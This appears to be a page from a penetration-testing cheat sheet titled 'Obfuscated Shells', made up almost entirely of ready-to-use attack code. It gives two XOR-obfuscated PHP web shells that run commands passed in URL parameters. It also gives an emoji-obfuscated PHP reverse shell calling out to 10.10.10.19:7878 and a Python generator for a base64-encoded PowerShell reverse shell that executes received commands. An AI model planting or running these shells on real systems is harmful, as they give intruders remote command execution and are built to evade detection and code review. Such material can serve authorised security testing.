Obfuscated Shells

Web Shells

Obfuscated PHP

#Usage: http://target.com/path/to/shell.php?0=command
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
#Usage: http://target.com/path/to/shell.php?_=function&__=argument
#Example: http://target.com/path/to/shell.php?_=system&__=ls
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

Reverse Shells

Emoji PHP

php -r '$๐Ÿ˜€="1";$๐Ÿ˜="2";$๐Ÿ˜…="3";$๐Ÿ˜†="4";$๐Ÿ˜‰="5";$๐Ÿ˜Š="6";$๐Ÿ˜Ž="7";$๐Ÿ˜="8";$๐Ÿ˜š="9";$๐Ÿ™‚="0";$๐Ÿคข=" ";$๐Ÿค“="<";$๐Ÿค =">";$๐Ÿ˜ฑ="-";$๐Ÿ˜ต="&";$๐Ÿคฉ="i";$๐Ÿค”=".";$๐Ÿคจ="/";$๐Ÿฅฐ="a";$๐Ÿ˜="b";$๐Ÿ˜ถ="i";$๐Ÿ™„="h";$๐Ÿ˜‚="c";$๐Ÿคฃ="d";$๐Ÿ˜ƒ="e";$๐Ÿ˜„="f";$๐Ÿ˜‹="k";$๐Ÿ˜˜="n";$๐Ÿ˜—="o";$๐Ÿ˜™="p";$๐Ÿค—="s";$๐Ÿ˜‘="x";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = "10.10.10.19";$๐Ÿ’ป = 7878;$๐Ÿš = "sh". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ =  $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. $๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'

Powershell b64 encoded

#Execute in your linux to generate your Powershell Reverse Shell
python -c $'import base64; IP = "10.10.10.19"; PORT = "7878"; payload = \'$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\' % (IP, int(PORT)); print("powershell -e " + base64.b64encode(payload.encode("utf16")[2:]).decode());'
PreviousReverse ShellsNextLinux

Last updated